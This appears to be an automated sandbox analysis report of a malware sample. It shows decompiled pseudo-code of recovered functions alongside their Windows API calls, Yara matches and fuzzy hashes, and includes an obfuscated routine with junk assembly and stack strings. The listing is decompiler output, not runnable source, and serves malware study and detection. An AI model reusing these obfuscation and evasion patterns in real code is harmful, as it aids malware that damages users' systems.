                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 72%
                                                                                            			E0041838B(signed int __ebx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t16;
				void* _t25;
				signed int _t29;

				_t18 = __ebx & _t29;
				asm("outsd");
				 *((intOrPtr*)(_t18 + 0x55)) =  *((intOrPtr*)((__ebx & _t29) + 0x55)) - _t18;
				_push(_t29);
				_t12 = _a4;
				_t5 = _t12 + 0xc60; // 0xca0
				E00418DB0(_t25, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t16 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t16;
			}






                                                                                            0x0041838b
                                                                                            0x0041838d
                                                                                            0x0041838e
                                                                                            0x00418390
                                                                                            0x00418393
                                                                                            0x0041839f
                                                                                            0x004183a7
                                                                                            0x004183c9
                                                                                            0x004183cd

                                                                                            APIs
                                                                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.271117141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateMemoryVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 2167126740-0
                                                                                            • Opcode ID: 90b4b4d6a87fec0e3ee07628d04621249aeea7168c3680a55fd00696984ddb13
                                                                                            • Instruction ID: e33716c473c1a6e546ff089dea15d4fac4e1bd4e2ae9c8d374149b142e10dc26
                                                                                            • Opcode Fuzzy Hash: 90b4b4d6a87fec0e3ee07628d04621249aeea7168c3680a55fd00696984ddb13
                                                                                            • Instruction Fuzzy Hash: 1BF0F2B6200208ABCB18DF99DC95EEB77A9BF88354F15815DBE1897241C630E950CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00418390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00418390(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DB0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                                            0x0041839f
                                                                                            0x004183a7
                                                                                            0x004183c9
                                                                                            0x004183cd

                                                                                            APIs
                                                                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.271117141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateMemoryVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 2167126740-0
                                                                                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                            • Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
                                                                                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                            • Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004182E0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E004182E0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409733
				E00418DB0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                                                            0x004182e3
                                                                                            0x004182e6
                                                                                            0x004182ef
                                                                                            0x004182f7
                                                                                            0x00418305
                                                                                            0x00418309

                                                                                            APIs
                                                                                            • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.271117141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Close
                                                                                            • String ID:
                                                                                            • API String ID: 3535843008-0
                                                                                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                            • Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
                                                                                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                            • Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004088A0, Relevance: .1, Instructions: 92COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 93%
                                                                                            			E004088A0(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E00(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407010( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E00419CC0( &_v284, 0x104);
						E0041A330( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DC0(E00413D60(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1b5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407040( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070C0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                                                                            0x004088ab
                                                                                            0x004088b3
                                                                                            0x004088b5
                                                                                            0x004088ba
                                                                                            0x004088bf
                                                                                            0x004088d2
                                                                                            0x004088d7
                                                                                            0x004088e0
                                                                                            0x004088ec
                                                                                            0x004088ff
                                                                                            0x00408904
                                                                                            0x00408907
                                                                                            0x00408910
                                                                                            0x00408922
                                                                                            0x00408927
                                                                                            0x0040892c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040892e
                                                                                            0x00408932
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00408934
                                                                                            0x00000000
                                                                                            0x00408932
                                                                                            0x00408936
                                                                                            0x00408939
                                                                                            0x0040893f
                                                                                            0x00408941
                                                                                            0x0040894c
                                                                                            0x00408951
                                                                                            0x00408954
                                                                                            0x00408961
                                                                                            0x0040896c
                                                                                            0x0040896e
                                                                                            0x00408974
                                                                                            0x00408978
                                                                                            0x0040897b
                                                                                            0x0040897b
                                                                                            0x00408982
                                                                                            0x00408985
                                                                                            0x0040898a
                                                                                            0x00408997
                                                                                            0x004088c6
                                                                                            0x004088c6
                                                                                            0x004088c6

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.271117141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                                                            • Instruction ID: 5568bf364e599ab98db8d6cec98c55b42aa716c8f34da205b899e6f8c2a7a87e
                                                                                            • Opcode Fuzzy Hash: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                                                            • Instruction Fuzzy Hash: EF213CB2C4420857CB20E6649D42BFF73BC9B50304F44057FE989A3181F638BB498BA6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00418447, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.271117141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap
                                                                                            • String ID: hA
                                                                                            • API String ID: 1279760036-1221461045
                                                                                            • Opcode ID: 269900346b7c3cf1095cd121d9a13cafab3a846ac9cdea7f6ce23ea480356605
                                                                                            • Instruction ID: a92fe9ae98136920995dbb6c9f8f490c0a28fc78c4328f558ebb06bb2a3a51d6
                                                                                            • Opcode Fuzzy Hash: 269900346b7c3cf1095cd121d9a13cafab3a846ac9cdea7f6ce23ea480356605
                                                                                            • Instruction Fuzzy Hash: D1F04F763002156FDA24EF99EC84EE7736DEF88360B10855AFA4D9B201D931EA5587E0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 74%
                                                                                            			E00407260(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t22;
				intOrPtr* _t26;
				void* _t27;
				void* _t31;

				_t31 = __eflags;
				_v68 = 0;
				E00419D10( &_v67, 0, 0x3f);
				E0041A8F0( &_v68, 3);
				_t12 = E00409B10(__ebx, __edi, _t31, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t26 = _t13;
				if(_t26 != 0) {
					_push(__edi);
					_t22 = _a8;
					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t26(_t22, 0x8003, _t27 + (E00409270(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                                                            0x00407260
                                                                                            0x0040726f
                                                                                            0x00407273
                                                                                            0x0040727e
                                                                                            0x0040728e
                                                                                            0x0040729e
                                                                                            0x004072a3
                                                                                            0x004072aa
                                                                                            0x004072ac
                                                                                            0x004072ad
                                                                                            0x004072ba
                                                                                            0x004072bc
                                                                                            0x004072be
                                                                                            0x004072db
                                                                                            0x004072db
                                                                                            0x00000000
                                                                                            0x004072dd
                                                                                            0x004072e2

                                                                                            APIs
                                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.271117141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: MessagePostThread
                                                                                            • String ID:
                                                                                            • API String ID: 1836367815-0
                                                                                            • Opcode ID: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                                                            • Instruction ID: ed9c0dd32f68776d22a62b6ccf8dda9c2c93357863a303a75fe51d199eec68b3
                                                                                            • Opcode Fuzzy Hash: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                                                            • Instruction Fuzzy Hash: DE018431A8032876E720A6959C03FFE776C5B40B55F15416EFF04BA1C2E6A87D0646EA
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0041852D, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.271117141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExitProcess
                                                                                            • String ID:
                                                                                            • API String ID: 621844428-0
                                                                                            • Opcode ID: 540bfc6e7dd3a05608229c53d547d5ceb1e2f8f92c80232f9867aac60bdf6548
                                                                                            • Instruction ID: 90963e86cd57150ed095c23e32252a4bc52356d2fee715913416bcb79a385e3c
                                                                                            • Opcode Fuzzy Hash: 540bfc6e7dd3a05608229c53d547d5ceb1e2f8f92c80232f9867aac60bdf6548
                                                                                            • Instruction Fuzzy Hash: B60117B2200208BBCB44DF99DC80DEB77ADEF8C354F118249FA0D97241DA34E951CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004184B4, Relevance: 1.5, APIs: 1, Instructions: 26memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 82%
                                                                                            			E004184B4(void* __ecx, void* __edx, void* _a4, long _a8, void* _a12) {
				intOrPtr _v0;
				char _t12;

				_push(0x3c);
				 *((intOrPtr*)(__ecx + 0x5506bd67)) =  *((intOrPtr*)(__ecx + 0x5506bd67)) - __edx;
				_t9 = _v0;
				_t5 = _t9 + 0xc74; // 0xc74
				E00418DB0(0x21c5d300, _v0, _t5,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
				_t12 = RtlFreeHeap(_a4, _a8, _a12); // executed
				return _t12;
			}





                                                                                            0x004184b4
                                                                                            0x004184bb
                                                                                            0x004184c3
                                                                                            0x004184cf
                                                                                            0x004184d7
                                                                                            0x004184ed
                                                                                            0x004184f1

                                                                                            APIs
                                                                                            • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.271117141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FreeHeap
                                                                                            • String ID:
                                                                                            • API String ID: 3298025750-0
                                                                                            • Opcode ID: 217add93ce38b03714e6ccd2c066df5cfb3b48363690f25c7b28eacd6981adb7
                                                                                            • Instruction ID: c5ff80edf742f8a68fdad7a16a09cf22f23f4b8e9e8c60093caf9f0ba1e94a67
                                                                                            • Opcode Fuzzy Hash: 217add93ce38b03714e6ccd2c066df5cfb3b48363690f25c7b28eacd6981adb7
                                                                                            • Instruction Fuzzy Hash: ADE06DB1200304ABDB14DF65DC49EA7376CAF88750F114199FE085B382D531E901CBE4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004184C0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E004184C0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E00418DB0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                            0x004184cf
                                                                                            0x004184d7
                                                                                            0x004184ed
                                                                                            0x004184f1

                                                                                            APIs
                                                                                            • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.271117141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FreeHeap
                                                                                            • String ID:
                                                                                            • API String ID: 3298025750-0
                                                                                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                            • Instruction ID: bd69bb0d8e56be58ea846d441575552e1355d89f45fa104c15060bc9e05e818a
                                                                                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                            • Instruction Fuzzy Hash: EDE01AB12002046BDB14DF59DC45EE777ACAF88750F014559BA0857241CA30E9108AF4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00418480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 36%
                                                                                            			E00418480(intOrPtr _a4, void* _a8, intOrPtr _a12, void* _a16) {
				intOrPtr _t9;
				void* _t10;
				void* _t12;
				void* _t15;

				E00418DB0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t9 = _a12;
				_t12 = _a8;
				asm("les edx, [edx+edx*2]");
				_push(_t9);
				_t10 = RtlAllocateHeap(_t12); // executed
				return _t10;
			}







                                                                                            0x00418497
                                                                                            0x0041849f
                                                                                            0x004184a2
                                                                                            0x004184a6
                                                                                            0x004184ab
                                                                                            0x004184ad
                                                                                            0x004184b1

                                                                                            APIs
                                                                                            • RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.271117141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 1279760036-0
                                                                                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                            • Instruction ID: 95874ba5a5537b3d16e5bdcad340c4ef7a657c48911e570d945e23b5f838c0ed
                                                                                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                            • Instruction Fuzzy Hash: 7BE012B1200208ABDB14EF99DC41EE777ACAF88654F118559BA085B282CA30F9108AF4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00418620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00418620(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E00418DB0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                            0x0041863a
                                                                                            0x00418650
                                                                                            0x00418654

                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.271117141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID:
                                                                                            • API String ID: 3899507212-0
                                                                                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                            • Instruction ID: 1821f594b7a2fedb3326d3670d224aab122327744fc2f581a2e4424e2d02315d
                                                                                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                            • Instruction Fuzzy Hash: 2AE01AB12002086BDB10DF49DC85EE737ADAF89650F018159BA0857241C934E8108BF5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004184F2, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.271117141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExitProcess
                                                                                            • String ID:
                                                                                            • API String ID: 621844428-0
                                                                                            • Opcode ID: bd1f1d00b990849b1b28ea03b0bda0963b0950482f732132c2dd7ed56697f344
                                                                                            • Instruction ID: 33e441391f2a0b1e398b113c2e5be7578dcf48d956c97fd458980edbc3fb36c1
                                                                                            • Opcode Fuzzy Hash: bd1f1d00b990849b1b28ea03b0bda0963b0950482f732132c2dd7ed56697f344
                                                                                            • Instruction Fuzzy Hash: 4BE04F316002507BDB219BA48C89FD73FA89F4A750F1588A9B9999B242C570EA04C6D1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00418500, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.271117141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExitProcess
                                                                                            • String ID:
                                                                                            • API String ID: 621844428-0
                                                                                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                            • Instruction ID: 9f62bdc44f65d7d9a2483e28fb075f3ff631dd5cfbab79109080827007e6cc43
                                                                                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                            • Instruction Fuzzy Hash: 62D012716003147BD620DF99DC85FD7779CDF49750F018069BA1C5B241C931BA0086E5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Function 00416282, Relevance: 6.4, Strings: 5, Instructions: 197COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 66%
                                                                                            			E00416282(signed int __eax, signed char __ebx, void* __edx, signed int __esi) {
				signed int _t73;
				intOrPtr _t84;
				void* _t90;
				intOrPtr _t105;
				void* _t116;
				intOrPtr _t161;
				signed int _t166;
				intOrPtr _t169;
				intOrPtr _t171;
				void* _t174;
				void* _t177;
				void* _t178;
				void* _t179;
				void* _t180;
				void* _t185;

				_t121 = __ebx;
				asm("lodsd");
				asm("fild dword [eax]");
				asm("o16 sub al, 0xcd");
				_t73 = __eax & 0x00000073;
				asm("lahf");
				asm("cli");
				_t166 = __esi &  *(_t73 + 0x20);
				asm("daa");
				gs = _t166;
				asm("in al, dx");
				asm("aad 0x24");
				if(_t166 - 1 <= 0) {
					asm("lock push eax");
					asm("outsd");
					if(__eflags < 0) {
						L6:
						asm("rcr dword [ecx+edx*2], 0xe8");
						 *_t121 =  *_t121 ^ _t121;
						 *_t73 =  *_t73 + _t73;
						_t178 = _t177 + 0x24;
						__eflags =  *((intOrPtr*)(_t161 + 1)) - _t121;
						if( *((intOrPtr*)(_t161 + 1)) != _t121) {
							E0041A090(_t174 - 0x828,  *0x7C773B81, _t121);
							_t51 = _t174 + 8; // 0x72657355
							E0041A090(_t174 - 0x828, _t51, _t121);
							_t53 = _t174 - 0x10; // 0x74726f50
							E0041A090(_t174 - 0x828, _t53, _t121);
							E0041A090(_t174 - 0x828, _t174 - 0x24, _t121);
							_t57 = _t174 + 8; // 0x72657355
							E0041A090(_t174 - 0x828, _t57, _t121);
							_t59 = _t174 - 8; // 0x72657355
							E0041A090(_t174 - 0x828, _t59, _t121);
							_t84 =  *0x7C773B89;
							_t179 = _t178 + 0x48;
							__eflags = _t84 - _t121;
							if(_t84 != _t121) {
								E0041A090(_t174 - 0x828, _t84, _t121);
								_t179 = _t179 + 0xc;
							}
							_t63 = _t174 + 8; // 0x72657355
							E0041A090(_t174 - 0x828, _t63, _t121);
							_t65 = _t174 - 8; // 0x72657355
							E0041A090(_t174 - 0x828, _t65, _t121);
							_t169 =  *0x7C773B8D;
							_t180 = _t179 + 0x18;
							__eflags = _t169 - _t121;
							if(_t169 != _t121) {
								E0041A090(_t174 - 0x828, _t169, _t121);
								_t180 = _t180 + 0xc;
							}
							_push(_t121);
							_t69 = _t174 + 8; // 0x72657355
							_push(_t174 - 0x828);
						} else {
							_t22 = _t174 - 0x828; // 0x12a0ca70
							_t24 = E00419F60(_t22) - 0x828; // 0x12a0ca70
							E0041A330(_t174 + _t24,  *((intOrPtr*)(0x7c773b81)));
							_t25 = _t174 + 8; // 0x72657355
							_t26 = _t174 - 0x828; // 0x12a0ca70
							E0041A090(_t26, _t25, _t121);
							_t27 = _t174 - 0x10; // 0x74726f50
							_t28 = _t174 - 0x828; // 0x12a0ca70
							E0041A090(_t28, _t27, _t121);
							_t30 = _t174 - 0x828; // 0x12a0ca70
							E0041A090(_t30, _t174 - 0x24, _t121);
							_t31 = _t174 + 8; // 0x72657355
							_t32 = _t174 - 0x828; // 0x12a0ca70
							E0041A090(_t32, _t31, _t121);
							_t33 = _t174 - 8; // 0x72657355
							_t34 = _t174 - 0x828; // 0x12a0ca70
							E0041A090(_t34, _t33, _t121);
							_t105 =  *((intOrPtr*)(0x7c773b89));
							_t185 = _t178 + 0x48;
							__eflags = _t105 - _t121;
							if(_t105 != _t121) {
								_t36 = _t174 - 0x828; // 0x12a0ca70
								_t38 = E00419F60(_t36) - 0x828; // 0x12a0ca70
								E0041A330(_t174 + _t38, _t105);
								_t185 = _t185 + 0xc;
							}
							_t39 = _t174 + 8; // 0x72657355
							_t40 = _t174 - 0x828; // 0x12a0ca70
							E0041A090(_t40, _t39, _t121);
							_t41 = _t174 - 8; // 0x72657355
							_t42 = _t174 - 0x828; // 0x12a0ca70
							E0041A090(_t42, _t41, _t121);
							_t171 =  *((intOrPtr*)(0x7c773b8d));
							_t180 = _t185 + 0x18;
							__eflags = _t171 - _t121;
							if(_t171 != _t121) {
								_t44 = _t174 - 0x828; // 0x12a0ca70
								_t46 = E00419F60(_t44) - 0x828; // 0x12a0ca70
								E0041A330(_t174 + _t46, _t171);
								_t180 = _t180 + 0xc;
							}
							_push(_t121);
							_t47 = _t174 + 8; // 0x72657355
							_t48 = _t174 - 0x828; // 0x12a0ca70
						}
						E0041A090();
						_t71 = _t174 - 0x828; // 0x12a0ca70
						_t90 = E00419F60(_t71);
					} else {
						 *((short*)(_t174 - 0xc)) = 0x93a;
						 *((char*)(_t174 - 0xa)) = __ebx;
						 *((intOrPtr*)(_t174 - 8)) = 0x72657355;
						 *((intOrPtr*)(_t174 - 4)) = 0x93a20;
						 *((intOrPtr*)(_t174 - 0x1c)) = 0x76726553;
						 *((intOrPtr*)(_t174 - 0x18)) = 0x93a7265;
						 *((char*)(_t174 - 0x14)) = __ebx;
						 *((char*)(_t174 - 0x828)) = __ebx;
						_t90 = E00419D10();
						_t161 =  *((intOrPtr*)(0x7c773b81));
						_t177 = _t177 + 0xc;
						__eflags = _t161 - __ebx;
						if(_t161 != __ebx) {
							__eflags =  *((intOrPtr*)(0x7c773b89)) - __ebx;
							if( *((intOrPtr*)(0x7c773b89)) != __ebx) {
								_t14 = _t174 - 0x1c; // 0x76726553
								_t116 = E00419F60(_t14);
								_t15 = _t174 - 0x1c; // 0x76726553
								_t16 = _t174 - 0x828; // 0x12a0ca70
								E00419C90(_t16, _t15, _t116);
								_t73 =  *(_t174 - 0x28) & 0x0000ffff;
								_t19 = _t174 - 0x24; // 0x12a0d274
								_push(8);
								_push(__ebx);
								_push(_t73);
								__eflags =  *0x7C773B6D + 0x1c;
								goto L6;
							}
						}
					}
					return _t90;
				} else {
					asm("loop 0x2d");
					asm("stosb");
					asm("fdivr dword [edi]");
					asm("aam 0x7f");
					asm("invalid");
					asm("in eax, dx");
					asm("rol byte [esi+0x251d2ab8], 1");
					return 0x975c39eb;
				}
			}


















                                                                                            0x00416282
                                                                                            0x00416283
                                                                                            0x00416284
                                                                                            0x00416286
                                                                                            0x00416289
                                                                                            0x0041628b
                                                                                            0x0041628c
                                                                                            0x0041628d
                                                                                            0x00416290
                                                                                            0x00416292
                                                                                            0x0041629a
                                                                                            0x0041629b
                                                                                            0x0041629d
                                                                                            0x0041630f
                                                                                            0x00416311
                                                                                            0x00416312
                                                                                            0x00416388
                                                                                            0x00416388
                                                                                            0x0041638c
                                                                                            0x0041638e
                                                                                            0x00416390
